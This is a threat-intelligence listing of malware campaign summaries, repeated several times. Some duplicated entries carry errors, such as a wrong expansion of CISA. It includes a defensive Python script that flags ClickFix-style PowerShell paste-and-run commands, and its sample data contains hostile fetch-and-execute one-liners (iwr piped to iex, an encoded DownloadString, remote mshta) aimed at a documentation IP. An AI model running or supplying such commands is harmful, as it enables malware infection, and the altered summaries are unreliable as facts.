This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A suspected nation-state adversary exploited a zero-day vulnerability in the Ivanti Cloud Services Appliance (CSA) to gain access to a victim’s network, according to research by FortiGuard Labs and the Cybersecurity and Infrastructure Security Agency (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A HarfangLab report, published on 11 October 2024, traces the evolution of the HijackLoader loader, including its abuse of genuine code-signing certificates, and maps the tactics used to deploy its payloads, among them Lumma Stealer, to MITRE ATT&CK.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware Masquerading as Oculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
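The paste-and-run entries above (the Lumma Stealer fake CAPTCHA, the ClickFix Google Meet pages, "From Clipboard to Compromise" and this phishing-via-paste report) all end the same way: the victim runs a PowerShell one-liner that the attacker placed on the clipboard. The triage script below is an added example written for this listing, not code from any of those reports. It scores process-creation command lines for the traits such one-liners tend to share (hidden window, execution-policy bypass, a download cradle piped into Invoke-Expression, a remote mshta call, an -EncodedCommand blob, a "not a robot" comment) and decodes the base64/UTF-16LE payload so that a cradle hidden inside it is scored as well. The indicator names, weights, threshold and sample command lines are this example's own assumptions; the 203.0.113.0/24 addresses are a reserved documentation range.

```python
"""Score PowerShell command lines for ClickFix-style paste-and-run traits.

Added example for this listing; not code from any of the reports above.
Input is assumed to be process-creation command lines (Sysmon Event ID 1 or
Security Event ID 4688 style) supplied as plain strings.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Indicator name -> (weight, pattern). Names, weights and THRESHOLD are this
# example's own choices; tune them against local baseline telemetry.
INDICATORS = {
    "hidden_window":   (3, re.compile(r"-w(?:indowstyle|in)?\s+h(?:idden)?\b", re.I)),
    "policy_bypass":   (2, re.compile(r"-(?:ep|ex(?:ec(?:utionpolicy)?)?)\s+bypass\b", re.I)),
    "download_cradle": (4, re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|"
        r"start-bitstransfer|net\.webclient)\b", re.I)),
    "invoke_expr":     (3, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    "mshta_remote":    (5, re.compile(r"\bmshta(?:\.exe)?\s+\S*https?://", re.I)),
    "captcha_lure":    (4, re.compile(r"not a robot|captcha|verification id", re.I)),
    "remote_url":      (1, re.compile(r"https?://", re.I)),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
THRESHOLD = 6  # assumed cut-off: a cradle plus one evasion flag is enough


@dataclass
class Verdict:
    cmdline: str
    score: int = 0
    hits: List[str] = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENCODED.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64, or odd byte count
        return None


def triage(cmdline: str) -> Verdict:
    """Score one command line; a decoded payload is scanned alongside it."""
    v = Verdict(cmdline=cmdline, decoded=decode_encoded_command(cmdline))
    text = cmdline
    if v.decoded is not None:
        v.hits.append("encoded_command")
        v.score += 3
        text = f"{cmdline}\n{v.decoded}"
    for name, (weight, pattern) in INDICATORS.items():
        if pattern.search(text):
            v.hits.append(name)
            v.score += weight
    return v


def flagged(cmdlines: Iterable[str]) -> List[Verdict]:
    """Verdicts at or above THRESHOLD, highest score first."""
    return sorted((v for v in map(triage, cmdlines) if v.suspicious),
                  key=lambda v: v.score, reverse=True)


# Constructed sample command lines (not taken from any report above).
# 203.0.113.0/24 is a reserved documentation range, so nothing here resolves.
_ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
    .encode("utf-16-le")).decode("ascii")

SAMPLE_CMDLINES = [
    r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1",
    'powershell.exe -w hidden -ep bypass -c "iwr http://203.0.113.5/v.txt -UseBasicParsing | iex"',
    f"powershell.exe -nop -w hidden -enc {_ENCODED_PAYLOAD}",
    "mshta http://203.0.113.5/verify.hta # I am not a robot - reCAPTCHA Verification ID: 7391",
]

if __name__ == "__main__":
    for v in flagged(SAMPLE_CMDLINES):
        print(f"[{v.score:>2}] {', '.join(v.hits)}")
        print(f"     {v.cmdline[:90]}")
        if v.decoded:
            print(f"     decoded: {v.decoded}")
```

Feed it the command-line field of your process-creation events; the benign backup script scores 0 and the three pasted one-liners clear the threshold. Where PowerShell Script Block Logging (Event ID 4104) is enabled, the same indicators can be run over the logged script text, which captures the payload after every layer of decoding rather than only the outermost -EncodedCommand blob. Expect legitimate installer scripts that use `iwr ... | iex` to score high; the weights are the knob for that, not an exemption list.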
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited the Oracle WebLogic Server vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
